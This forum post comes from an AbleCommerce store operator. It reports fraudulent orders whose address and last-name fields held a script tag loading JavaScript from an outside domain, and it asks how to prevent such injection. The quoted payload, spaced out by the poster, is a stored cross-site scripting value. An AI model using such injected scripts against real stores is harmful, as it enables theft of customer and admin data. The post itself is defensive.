Rank: Member
Groups: Authorized User, Developers
Joined: 11/13/2018(UTC)
Posts: 23
Thanks: 16 times
Was thanked: 1 time(s) in 1 post(s)
|
Yesterday morning, we received a strange order. The billing and shipping information was for New Hampshire but the IP location was Singapore. For our customer base, this kind of scenario usually means a fraud attempt. This is not totally uncommon and we have procedures for this. But, I noticed something different about this order in that it had the following in Address Line 2 fields:
< script src = //addjs.co > < /script >
I've spaced out various parts of the code because i thought that would render it inoperable. I removed this code from the address line 2 field and followed our process for handling refund orders. This morning I received another of these same types of orders, with the same script in the Last Name field.
I do not know much about this other than the fact that it is a JavaScript Injection attempt. But to what end? What measures can we take within the AbleCommerce system to prevent this type of thing from happening again?
|
|
|
|
|
|
Forum Jump
You cannot post new topics in this forum.
You cannot reply to topics in this forum.
You cannot delete your posts in this forum.
You cannot edit your posts in this forum.
You cannot create polls in this forum.
You cannot vote in polls in this forum.
Important Information:
The AbleCommerce Forums uses cookies. By continuing to browse this site, you are agreeing to our use of cookies.
More Details
Close
